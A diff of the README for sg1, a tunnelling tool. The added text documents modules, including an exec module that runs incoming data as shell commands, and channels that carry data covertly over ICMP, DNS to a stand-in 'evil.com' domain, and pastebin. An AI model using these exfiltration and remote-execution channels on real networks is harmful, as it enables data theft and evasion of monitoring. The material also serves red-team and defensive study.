evilsocket/sg1/README.md

 4) Implement a new channel ( see `channels/*.go` ).
 5) Write tests, because I'm a lazy s--t.

+## Features

+The main `sg1` operation logic is:

+    while input.has_data() {
+        data = input.read()
+        results = module.process(data)
+        output.write(data)
+    }

+Keep in mind that modules and channels can be piped one to another.

+### Modules

+**raw**

+The default mode, will read from input and write to output.

+**base64**

+Will read from input, encode in base64 and write to output.

+**aes**

+Will read from input, encrypt or decrypt (depending on `--aes-mode` parameter) with `--aes-key` and write to output.

+**exec**

+Will read from input, execute as a shell command and pipe to output.

+### Channels

+**console**

+The default channel, stdin or stdout depending on the direction.

+**tcp**

+A tcp server (if used as input) or client (as output).

+Examples:

+    -in tcp:0.0.0.0:10000
+    -out tcp:192.168.1.2:10000

+**tls**

+A tls tcp server (if used as input) or client (as output), it will automatically generate the key pair or load them via `--tls-pem` and `--tls-key` optional parameters.

+Examples:

+    -in tls:0.0.0.0:10003
+    -out tls:192.168.1.2:10003

+**icmp**

+If used as output, data will be chunked and sent as ICMP echo packets, as input an ICMP listener will be started decoding those packets.

+Examples:

+    -in icmp:0.0.0.0
+    -out icmp:192.168.1.2

+**dns**

+If used as output, data will be chunked and sent as DNS requests, as input a DNS server will be started decoding those requests.
+The accepted syntaxes are:

+    dns:domain.tld@resolver:port

+In which case, DNS requests will be performed (or decoded) for subdomains of `domain.tld`, sent to the `resolver` ip address on `port`.

+    dns:domain.tld

+DNS requests will be performed (or decoded) for subdomains of `domain.tld` using default system resolver.

+    dns

+DNS requests will be performed (or decode) for subdomains of `google.com` using default system resolver.

+Examples:

+    -in dns:evil.com@0.0.0.0:10053
+    -out dns:evil.com@192.168.1.2:10053
+    -out dns:evil.com

+**pastebin**

+If used as output, data will be chunked and sent to pastebin.com as private pastes, as input a pastebin listener will be started decoding those pastes.

+Examples:

+    -in pastebin:YOUR-API-KEY/YOUR-USER-KEY
+    -out pastebin:YOUR-API-KEY/YOUR-USER-KEY

+[This](https://pastebin.com/api#8 ) is how you can retrieve your user key given your api key.

 ## Examples

 In the following examples you will always see 127.0.0.1, but that can be any ip, the tool is tunnelling data locally as a PoC but it also works among different computers on any network (as shown by one of the pictures).